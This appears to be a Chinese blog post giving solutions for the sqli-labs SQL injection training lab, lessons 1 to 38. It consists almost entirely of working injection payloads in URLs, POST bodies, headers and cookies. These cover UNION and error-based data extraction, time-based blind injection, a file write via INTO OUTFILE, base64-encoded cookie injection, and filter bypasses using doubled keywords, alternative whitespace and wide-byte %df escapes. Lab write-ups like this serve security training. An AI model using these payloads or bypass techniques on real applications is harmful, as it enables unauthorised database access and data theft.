sqli-lab 1-38

环境 sqli-labs php 5.5.9

less 1
http://192.168.1.5/sqli-labs/Less-1/
?id=1' and 1=0 union select 1,database(),user() --+

less 2
http://192.168.1.5/sqli-labs/Less-2/
?id=1  and 1=0 union select 1,database(),user() #

less 3
http://192.168.1.5/sqli-labs/Less-2/
?id=1  and 1=0 union select 1,database(),user() #

less 4 代码审计
http://192.168.1.5/sqli-labs/Less-4/
?id=1")  and 1=0 union select 1,database(),version() --%20  

less 5
http://192.168.1.5/sqli-labs/Less-5/
?id=12' and updatexml(1,concat(0x7e,version(),0x7e),1) --%20

less 6
http://192.168.1.5/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,version(),0x7e),1) --%20


less 7
http://192.168.1.5/sqli-labs/Less-7/
?id=1'))  and 1=0 union select 1,2,3 into outfile 'e:/asassadadadasdsadaddad.txt' --+

less 8
http://192.168.1.5/sqli-labs/Less-8/?id=1' and 1=0 union select if(length(database())>1,sleep(5),2),2,3 --+

http://192.168.1.5/sqli-labs/Less-8/?id=1' and ascii(substr((database()),1,1)) >80--+

less 9
http://192.168.1.5/sqli-labs/Less-9/?id=1' and if(length(database())>1,sleep(5),1) --+

less 10
'alert'
select ASCII(substring('alert',1,1));
http://192.168.1.5/sqli-labs/Less-10/?id=1" and if(ASCII(SUBSTRING('alert',1,2))=97,sleep(5),1) --+

less 11
POST /sqli-labs/Less-11/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-11/
Upgrade-Insecure-Requests: 1

uname=Dhakkan' or '1'='1&passwd=1&submit=Submit

less 12
POST /sqli-labs/Less-12/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-12/
Upgrade-Insecure-Requests: 1

uname=Dhakkan") or "1"="1" --+ &passwd=*/&submit=Submit


less 13
POST /sqli-labs/Less-13/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-13/
Upgrade-Insecure-Requests: 1

uname=Dhakkan') or  1=1 #&passwd=&submit=Submit

less 14
POST /sqli-labs/Less-14/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-14/
Upgrade-Insecure-Requests: 1

uname=Dhakkan'" or 1=1 --+&passwd=&submit=Submit


less 15
POST /sqli-labs/Less-15/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-15/
Upgrade-Insecure-Requests: 1

uname=Dhakkan' or 1=1 --+&passwd=&submit=Submit

less 16
POST /sqli-labs/Less-16/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-16/
Upgrade-Insecure-Requests: 1

uname=Dhakkan") or 1=1 --+&passwd=&submit=Submit

less 17
POST /sqli-labs/Less-17/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: http://192.168.1.5
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-17/
Upgrade-Insecure-Requests: 1

uname=Dhakkan&passwd=' and updatexml(1,concat(0x7e,database(),0x7e),1) --+&submit=Submit

less 18
POST /sqli-labs/Less-18/ HTTP/1.1
Host: #
User-Agent: ' and  updatexml(1,concat(7,database(),7),1) and '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin:test
Connection: close
Referer: http://192.168.1.5/sqli-labs/Less-18/
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

less 19
POST /sqli-labs/Less-19/ HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://192.168.1.5
Connection: close
Referer: ' and  updatexml(1,concat(7,database(),7),1) and '
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

less 20
cookie: uname =' and  updatexml(1,concat(7,database(),7),1) and '

less 21
cookie: uname=JyBhbmQgIHVwZGF0ZXhtbCgxLGNvbmNhdCg3LGRhdGFiYXNlKCksNyksMSkgYW5kICc=

less 22
GET /sqli-labs/Less-22/index.php HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.5/sqli-labs/Less-22/index.php
Connection: close
Cookie: uname=YWRtaW4iIGFuZCAgdXBkYXRleG1sKDEsY29uY2F0KDcsZGF0YWJhc2UoKSw3KSwxKSAj
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


less 23
http://192.168.1.5/sqli-labs/Less-23/index.php?id=1'  and 1=0 union select database(),version(),3 and '1'='1

less 24
二次注入
1、构造用户名 admin'#
2、任意修改 均无效

less 25
过滤 and  or  双写即可
http://192.168.1.5/sqli-labs/Less-25/?id=-1' union select database(),user(),version() --+

less 25a
http://192.168.1.5/sqli-labs/Less-25a/
?id=-2 union select database(),user(),version() --+

less 26
分析空格的绕过和截断方式
http://192.168.1.5/sqli-labs/Less-26/?id=1'||updatexml('^',concat(0x7e,user(),0x7e),'^')||'1'='1
http://192.168.1.5/sqli-labs/Less-26/?id=1'||updatexml('^',concat(0x7e,user(),0x7e),'^');%00
select '1'||updatexml('^',concat(0x7e,user(),0x7e),'^');%00

less 26a

空格绕过方式
/**/
%20
括号绕过格,只能用在表达式中,比如 select(user())     where 1=1 and(1=2)
%09 TAB(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB(垂直)      (php-5.2.17,5,3,29成功)
%a0 空格
windows平台可能失败,其他平台%a0可用
http://192.168.1.5/sqli-labs/Less-26a/
?id=1')%a0anandd%a01=2%%a0union%a0select%a0database(),user(),version()%a0;%00
http://192.168.1.5/sqli-labs/Less-26a/?id=1')%a0aandnd%a01=2%a0union%a0select%a0database(),user(),version();%00


less 27
大小写混合绕过
union 双写绕过
select 双写加%0b绕过
http://192.168.1.5/sqli-labs/Less-27/
?id=1'%a0and%a01=2%a0uniunionon%a0se%0bselectlect%a0user(),version(),database();%00
          

less 27a
http://192.168.30.12/sqli-labs/Less-27a/
?id=1"%a0and%a01=0%a0unIon%a0seLEct%a01,2,3%a0or%a0"1"="1
?id=0"%0a%0aununionion%0aSEselectlect%0a1,2,3%0a||%0a"1"="1

LESS 28
%0a 新建一行
%0b 在字符后面垂直换一行并在上一字符后接着写
%a0 空格

http://192.168.30.12/sqli-labs/Less-28/
?id=0')%0aUniOn%0BsElEct%091,database(),3%0aor%0b('1')=('1
?id=0')%0a%0aUNioN%0bseLECt%0a1,2,3%0a||%0a('1')=('1

less 28a
http://192.168.30.12/sqli-labs/Less-28a/?id=10000')%0bunion%0bselect%0b1,2,3%0band('1')=('2

 

less 29
http://192.168.30.12/sqli-labs/Less-29/?id=1' and 1=2 union select database(),version(),database();%00

less 30
http://192.168.30.12/sqli-labs/Less-30/?id=0" union select database(),version(),user();%00

less 31
http://192.168.30.12/sqli-labs/Less-31/
?id=0")%0buNIOn%0bselECT%0bdatabase(),version(),user();%00

less 32
http://192.168.30.12/sqli-labs/Less-32/
?id=2%df'and updatexml(1,concat(2,database(),2),1);%00

http://192.168.30.12/sqli-labs/Less-32/
?id=0%df' union select database(),version(),user();%00

less 33
http://192.168.30.12/sqli-labs/Less-33/?id=0%df' union select database(),version(),user() --+

less 34
Host: 192.168.30.12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.30.12/sqli-labs/Less-34/
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://192.168.30.12
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin%df'+or+1=1 limit 1,2--+&passwd=1234&submit=Submit

less 35
http://192.168.30.12/sqli-labs/Less-35/?id=0

less 36
http://192.168.30.12/sqli-labs/Less-36/?id=0%df' and updatexml(1,concat(2,database(),2),1)--+

less 37
uname=admin%df'+or+1=1 limit 1,2--+&passwd=1234&submit=Submit

less 38
http://192.168.1.5/sqli-labs/Less-38/?id=0' union select version(),database(),user() from dual where  '1'='1';%00

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值